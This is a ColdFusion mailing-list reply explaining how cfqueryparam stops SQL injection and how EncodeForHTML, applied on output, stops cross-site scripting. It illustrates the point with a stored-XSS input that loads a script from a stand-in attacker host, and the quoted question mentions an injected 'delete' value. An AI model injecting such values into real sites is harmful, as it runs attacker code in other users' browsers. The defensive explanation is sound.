cfqueryparam and EncodeForHTML are used to prevent two different types of attack.
cfqueryparam is for SQL injection attacks, as Byron explained. EncodeForHTML is used to prevent cross site scripting attacks (it does not prevent/escape sql injection), which exist when the attacker can execute arbitrary client side code (such as javascript). Suppose we specified companyName=Johnson & Johnson's<script src="//hackers.r.us/badstuff.js"> If you inserted that value into the db everyone who views that record in the DB may potentially execute the hackers javascript file which can do lots of things, potentially on behalf of the currently authenticated user. You don't necessarily need to run EncodeForHTML before inserting the data into the database, you just need to make sure that you call EncodeForHTML every time you output the variable. The reason for this is that you can end up double encoding when you edit the record, or maybe you want to output the value in another context such as a HTML attribute, then you want to use EncodeForHTMLAttribute on the raw value instead. In some apps though it can be a much easier solution to just encode it before inserting the data if it is output in a million places. -- Pete Freitag - Adobe Community Professional http://foundeo.com/ - ColdFusion Consulting & Products http://hackmycf.com - Is your ColdFusion Server Secure? http://www.youtube.com/watch?v=ubESB87vl5U - FuseGuard your CFML in 10 minutes On Mon, Nov 3, 2014 at 3:41 PM, Stephens, Larry V <steph...@iu.edu> wrote: > > Text input field > Entry is Johnson & Johnson's > I store it in a table using cfqueryparam. All is good. > > Let's say the hacked entry is Johnson & Johnson's;delete * (or something > akin to that - you get the drift) I use cfqueryparam but it won't catch the > hack; it's still just a string. > > At some point, before storing or after retrieval, I use EncodeForHTML to > make that safe. Now I have either > > Johnson & Johnson's > > or > > Johnson & Johnson's;delete * > > Supposedly, that's safe. Regex could strip out the "delete" or kill the > thing when I tried to save the data in the first place, but I tried several > examples and none seemed to work. > > The thing is, Johnson & Johnson's may display correctly on the > screen but it's not good for a search function, particularly if I have a > legacy database. > > To parody a commercial for a different product, what are you using for > protection? > > > Larry V. Stephen > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359562 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
